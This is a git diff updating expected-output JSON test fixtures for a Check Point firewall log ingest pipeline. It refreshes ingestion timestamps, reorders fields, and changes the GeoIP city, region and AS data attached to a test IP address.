diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json index c3f9b8014f7..06f61f825aa 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json @@ -54,7 +54,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:18.614546900Z", + "ingested": "2021-12-14T14:36:07.505524185Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; time:\"1594646954\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", 
@@ -73,23 +73,38 @@ "checkpoint": { "action_reason_msg": "Dropped by multiportal infrastructure" }, + "observer": { + "name": "127.0.0.1", + "ingress": { + "interface": { + "name": "bond1.3999" + } + }, + "product": "VPN \u0026 FireWall", + "type": "firewall", + "vendor": "Checkpoint" + }, + "@timestamp": "2021-05-05T12:27:09.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "81.2.69.144", + "81.2.69.144" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, 
@@ -98,56 +113,22 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 52780, "ip": "81.2.69.144" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "6", - "direction": "inbound" - }, - "observer": { - "name": "127.0.0.1", - "ingress": { - "interface": { - "name": "bond1.3999" - } - }, - "product": "VPN \u0026 FireWall", - "type": "firewall", - "vendor": "Checkpoint" - }, - "@timestamp": "2021-05-05T12:27:09.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "81.2.69.144", - "81.2.69.144" - ] - }, "event": { "sequence": 62, - "ingested": "2021-12-09T13:31:18.614555700Z", + "ingested": "2021-12-14T14:36:07.505526452Z", "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"81.2.69.144\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"81.2.69.144\"]", "kind": "event", "action": "Drop", @@ -155,6 +136,13 @@ "category": [ "network" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "6", + "direction": "inbound" } } ] 
diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json index 0d89f653dc7..36903c0bbd5 100644 --- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json +++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083259700Z", + "ingested": "2021-12-14T14:36:07.875459109Z", "original": "\u003c134\u003e1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"1\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk\"]", "id": "{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}", "category": [ @@ -57,7 +57,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083263700Z", + "ingested": "2021-12-14T14:36:07.875461285Z", "original": "\u003c134\u003e1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:\"133440\"; ifdir:\"inbound\"; ifname:\"daemon\"; loguid:\"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}\"; origin:\"192.168.1.100\"; sequencenum:\"2\"; version:\"5\"; product:\"System Monitor\"; sys_message::\"installed Standard\"]", "id": "{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}", "category": [ 
@@ -126,7 +126,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083267900Z", + "ingested": "2021-12-14T14:36:07.875461740Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"46915\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -153,20 +153,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 443, 
@@ -218,7 +212,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083271700Z", + "ingested": "2021-12-14T14:36:07.875462151Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61794\"; service:\"443\"; service_id:\"https\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"26680\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", 
@@ -287,7 +281,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-12-09T13:31:19.083278100Z", + "ingested": "2021-12-14T14:36:07.875462546Z", "original": "\u003c134\u003e1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Internal\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"36749\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -320,7 +314,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083282500Z", + "ingested": "2021-12-14T14:36:07.875462931Z", "original": "\u003c134\u003e1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}", "category": [ 
@@ -347,20 +341,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, @@ -412,7 +400,7 @@ }, "event": { "sequence": 8, - "ingested": "2021-12-09T13:31:19.083286800Z", + "ingested": "2021-12-14T14:36:07.875463340Z", "original": "\u003c134\u003e1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"8\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", 
@@ -439,20 +427,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 53, @@ -497,7 +479,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083347300Z", + "ingested": "2021-12-14T14:36:07.875463730Z", "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", "kind": "event", "action": "Accept", 
@@ -529,7 +511,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083353400Z", + "ingested": "2021-12-14T14:36:07.875464124Z", "original": "\u003c134\u003e1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Started\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -556,20 +538,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 80, 
@@ -621,7 +597,7 @@ }, "event": { "sequence": 2, - "ingested": "2021-12-09T13:31:19.083357600Z", + "ingested": "2021-12-14T14:36:07.875464526Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", 
@@ -690,7 +666,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-12-09T13:31:19.083362200Z", + "ingested": "2021-12-14T14:36:07.875464913Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"47919\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -723,7 +699,7 @@ }, "event": { "sequence": 5, - "ingested": "2021-12-09T13:31:19.083366500Z", + "ingested": "2021-12-14T14:36:07.875465515Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"5\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}", "category": [ 
@@ -792,7 +768,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-12-09T13:31:19.083393500Z", + "ingested": "2021-12-14T14:36:07.875465913Z", "original": "\u003c134\u003e1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"13\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -826,7 +802,7 @@ "event": { "severity": 1, "sequence": 1, - "ingested": "2021-12-09T13:31:19.083397600Z", + "ingested": "2021-12-14T14:36:07.875466302Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"Application Control\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x0,0x6401a8c0,0x108620ab}", 
@@ -860,7 +836,7 @@ "event": { "severity": 1, "sequence": 2, - "ingested": "2021-12-09T13:31:19.083401900Z", + "ingested": "2021-12-14T14:36:07.875466688Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"URL Filtering\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x1,0x6401a8c0,0x108620ab}", @@ -929,7 +905,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083405700Z", + "ingested": "2021-12-14T14:36:07.875467078Z", "original": "\u003c134\u003e1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"138\"; service:\"138\"; service_id:\"nbdatagram\"; src:\"192.168.1.1\"]", "kind": "event", "action": "Accept", 
@@ -950,39 +926,6 @@ "tcp_flags": "FIN-ACK", "logid": "1" }, - "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "port": 80, - "ip": "81.2.69.144" - }, - "source": { - "port": 65488, - "ip": "192.168.1.100" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "6", - "direction": "outbound" - }, "observer": { "name": "192.168.1.100", "product": "VPN-1 \u0026 FireWall-1", @@ -1004,9 +947,29 @@ "81.2.69.144" ] }, + "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "port": 80, + "ip": "81.2.69.144" + }, + "source": { + "port": 65488, + "ip": "192.168.1.100" + }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083411200Z", + "ingested": "2021-12-14T14:36:07.875467603Z", "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", "kind": "event", "action": "Drop", 
@@ -1014,6 +977,13 @@ "category": [ "network" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "6", + "direction": "outbound" } }, { @@ -1070,7 +1040,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083415400Z", + "ingested": "2021-12-14T14:36:07.875468033Z", "original": "\u003c134\u003e1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", 
@@ -1139,7 +1109,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083419800Z", + "ingested": "2021-12-14T14:36:07.875468418Z", "original": "\u003c134\u003e1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"50024\"; service:\"137\"; service_id:\"nbname\"; src:\"192.168.1.196\"]", "kind": "event", "action": "Accept", 
